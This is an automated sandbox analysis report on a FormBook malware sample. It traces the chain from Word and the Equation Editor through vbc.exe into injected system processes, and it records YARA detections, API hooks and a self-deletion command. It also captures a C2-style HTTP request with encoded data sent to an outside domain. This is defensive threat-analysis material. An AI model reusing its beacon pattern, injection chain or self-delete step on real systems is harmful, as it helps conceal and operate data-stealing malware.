                                                                                                                                                      Nov 20, 2020 20:06:00.436189890 CET751INData Raw: 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64
                                                                                                                                                      Data Ascii: ct-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a
                                                                                                                                                      Nov 20, 2020 20:06:00.436230898 CET752INData Raw: 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20
                                                                                                                                                      Data Ascii: nfo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
                                                                                                                                                      Nov 20, 2020 20:06:00.436270952 CET754INData Raw: 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                                                      Data Ascii: ght: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info {
                                                                                                                                                      Nov 20, 2020 20:06:00.436325073 CET755INData Raw: 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79
                                                                                                                                                      Data Ascii: IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfF
                                                                                                                                                      Nov 20, 2020 20:06:00.436364889 CET757INData Raw: 4f 72 56 30 52 49 71 2f 36 2b 42 49 50 50 56 56 4c 72 62 41 56 41 75 6c 51 4b 49 77 41 4f 2f 39 6a 55 4b 79 4a 6b 35 31 53 6d 4f 35 77 77 68 70 48 58 61 63 30 45 33 45 51 45 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34
                                                                                                                                                      Data Ascii: OrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMX
                                                                                                                                                      Nov 20, 2020 20:06:00.436414003 CET758INData Raw: 50 54 54 74 39 47 51 41 36 68 2b 64 2f 31 64 45 35 41 6e 39 47 52 48 35 6f 35 6d 77 49 67 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45
                                                                                                                                                      Data Ascii: PTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua
                                                                                                                                                      Nov 20, 2020 20:06:00.436458111 CET759INData Raw: 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69
                                                                                                                                                      Data Ascii: </div> <section class="additional-info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/se


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      2192.168.2.2249167146.148.194.20980C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 20, 2020 20:06:20.968894005 CET760OUTGET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1
                                                                                                                                                      Host: www.sgbanfang.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Nov 20, 2020 20:06:21.133157969 CET760INHTTP/1.1 404 Not Found
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:06:21 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 146
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                      Code Manipulations

                                                                                                                                                      User Modules

                                                                                                                                                      Hook Summary

                                                                                                                                                      Function NameHook TypeActive in Processes
                                                                                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                                                                                      GetMessageWINLINEexplorer.exe
                                                                                                                                                      GetMessageAINLINEexplorer.exe

                                                                                                                                                      Processes

                                                                                                                                                      Process: explorer.exe, Module: USER32.dll
                                                                                                                                                      Function NameHook TypeNew Data
                                                                                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE7
                                                                                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE7
                                                                                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE7
                                                                                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE7

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: WINWORD.EXE PID: 1276 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:42
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                      Imagebase:0x13f770000
                                                                                                                                                      File size:1424032 bytes
                                                                                                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: EQNEDT32.EXE PID: 1428 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:43
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: vbc.exe PID: 2492 Parent PID: 1428

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:46
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0xcb0000
                                                                                                                                                      File size:711168 bytes
                                                                                                                                                      MD5 hash:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2105488822.00000000021A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 35%, ReversingLabs
                                                                                                                                                      Reputation:low

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: RegSvcs.exe PID: 2560 Parent PID: 2492

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:48
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:45216 bytes
                                                                                                                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: RegSvcs.exe PID: 2520 Parent PID: 2492

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:48
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:45216 bytes
                                                                                                                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: explorer.exe PID: 1388 Parent PID: 2520

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:50
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: EQNEDT32.EXE PID: 2700 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:05
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: wlanext.exe PID: 2756 Parent PID: 1388

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:07
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                      Imagebase:0xb30000
                                                                                                                                                      File size:77312 bytes
                                                                                                                                                      MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 2812 Parent PID: 2756

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:11
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                                                                                                      Imagebase:0x4a5a0000
                                                                                                                                                      File size:302592 bytes
                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >

                                                                                                                                                        Analysis Process: vbc.exe PID: 2492 Parent PID: 1428 vbc.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00353738, Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: `!&m$`!&m
                                                                                                                                                        • API String ID: 0-1367616305
                                                                                                                                                        • Opcode ID: 07a39c282ca916910768675b830414ffaf119b379cdf45b2c951221faa01a479
                                                                                                                                                        • Instruction ID: 209d8076adc8a43772f4dbf777cc3c553143bfb17cb09cadfe0941341899d4ad
                                                                                                                                                        • Opcode Fuzzy Hash: 07a39c282ca916910768675b830414ffaf119b379cdf45b2c951221faa01a479
                                                                                                                                                        • Instruction Fuzzy Hash: AB9114B4E04218CFDB15CFA9D844AADFBB6FF88341F10856AD809AB260DB709A45CF51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 04875918, Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                        • Opcode ID: cc02b072e4e578db5e27528804f4544e1455d637f766d0e24f2403008aa3b5ad
                                                                                                                                                        • Instruction ID: 59f458d45e267f041e28d875b465e4567757ae2426d27720feecdd5facf8f493
                                                                                                                                                        • Opcode Fuzzy Hash: cc02b072e4e578db5e27528804f4544e1455d637f766d0e24f2403008aa3b5ad
                                                                                                                                                        • Instruction Fuzzy Hash: 7212EE75E002189FDB14CFA9C994AEDFBF2FF88304F148569E809A7651D734A981CF60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00353728, Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: `!&m
                                                                                                                                                        • API String ID: 0-3543177737
                                                                                                                                                        • Opcode ID: 166a8c41f629dfa695d1bfd2782f20b9a0993780bd29f60d1c14e29d0e497db7
                                                                                                                                                        • Instruction ID: 937990b490b81b287ace985a0682668aa786c39ea3a85db7dfe9401f69176ff8
                                                                                                                                                        • Opcode Fuzzy Hash: 166a8c41f629dfa695d1bfd2782f20b9a0993780bd29f60d1c14e29d0e497db7
                                                                                                                                                        • Instruction Fuzzy Hash: DE81F7B4D04218CFDB15CFA9D844AADFBF2FF89341F10856AD809AB261DB309A45CF51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00350ED0, Relevance: .3, Instructions: 313COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: aeff77706422fc54aa29e51f5d3eaef9022e8284c23ab026ca9c18f7dd1a624c
                                                                                                                                                        • Instruction ID: 7d5e721f63c9b81b1e119bf972d67a48aa451386e9dac28a80636960c756cf00
                                                                                                                                                        • Opcode Fuzzy Hash: aeff77706422fc54aa29e51f5d3eaef9022e8284c23ab026ca9c18f7dd1a624c
                                                                                                                                                        • Instruction Fuzzy Hash: A8D12B74E05218CFCB19CFA5D884BAEFBB5EF49301F1084A9D909AB364DB309985DF11
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00350EC0, Relevance: .3, Instructions: 298COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: eca02ea1797c9c3832a908c0ed6f87e92248e0d6f685e48bdab52edf642ad5ea
                                                                                                                                                        • Instruction ID: 08dcd0bfb67bf010f5e6d8a13054b88957bdc4c724eb9fd5bbd5a741391fa6e9
                                                                                                                                                        • Opcode Fuzzy Hash: eca02ea1797c9c3832a908c0ed6f87e92248e0d6f685e48bdab52edf642ad5ea
                                                                                                                                                        • Instruction Fuzzy Hash: 18D14E74E05219CFCB19CFA5D484BAEFBB6EF49301F1084AAD909AB364DB309985DF11
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003541BE, Relevance: .3, Instructions: 254COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8268137726793757b0e7ba2ffbb7bee07662a9d827c9219c962d4a35227d5f9d
                                                                                                                                                        • Instruction ID: 01b202e426b716aa71e62439354232e5885e79febccc76998d6f174de23f5aec
                                                                                                                                                        • Opcode Fuzzy Hash: 8268137726793757b0e7ba2ffbb7bee07662a9d827c9219c962d4a35227d5f9d
                                                                                                                                                        • Instruction Fuzzy Hash: 4CA11A74D04219CFDB09CFE9C444AADFBF6BF8831AF64852AD809A7364D7349986CB50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00353C48, Relevance: .2, Instructions: 219COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e8d756691c8a63b3af2f2b53203e7107c1e35de01ef743eefb81508f449619fd
                                                                                                                                                        • Instruction ID: 13ee2c28cb2c9e8949f0b500dcb6b83fdb609e3e3ee08a055b8bf1ae0d78c0c8
                                                                                                                                                        • Opcode Fuzzy Hash: e8d756691c8a63b3af2f2b53203e7107c1e35de01ef743eefb81508f449619fd
                                                                                                                                                        • Instruction Fuzzy Hash: 81911571D04219CFDB15CFA6C844BDEBBB6BF89341F1090A9D809B7265DB345A89CF11
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00350908, Relevance: .1, Instructions: 80COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 551d3370bdb86c5d3069f8668d773acca24889ae57cff1518aec35d1b41cb748
                                                                                                                                                        • Instruction ID: e9fdc951d250b42556db6a83be1b72762793bce851feb63c51762fbc60b25287
                                                                                                                                                        • Opcode Fuzzy Hash: 551d3370bdb86c5d3069f8668d773acca24889ae57cff1518aec35d1b41cb748
                                                                                                                                                        • Instruction Fuzzy Hash: 9421A374E05209EBDB08CFB5D5819AEFBF6EFC9301F60D8A58405A7768DB349A46DB00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0487E1C8, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 321processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0487E48F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                        • String ID: \tc$\tc$\tc
                                                                                                                                                        • API String ID: 963392458-2165942276
                                                                                                                                                        • Opcode ID: eefa5672cad0652f3648f3d282c0d17fb68337bbaf62bf96d05cd5d5c36e0cb5
                                                                                                                                                        • Instruction ID: c4b4b5c22b6768556c64d460c69bcf9c958c3c349703bc6efae8b3263b25a51c
                                                                                                                                                        • Opcode Fuzzy Hash: eefa5672cad0652f3648f3d282c0d17fb68337bbaf62bf96d05cd5d5c36e0cb5
                                                                                                                                                        • Instruction Fuzzy Hash: E8C12771D0021D8FDB20DFA4C8507EDBBB1BF49304F109AA9E859B7240EB74AA85DF95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

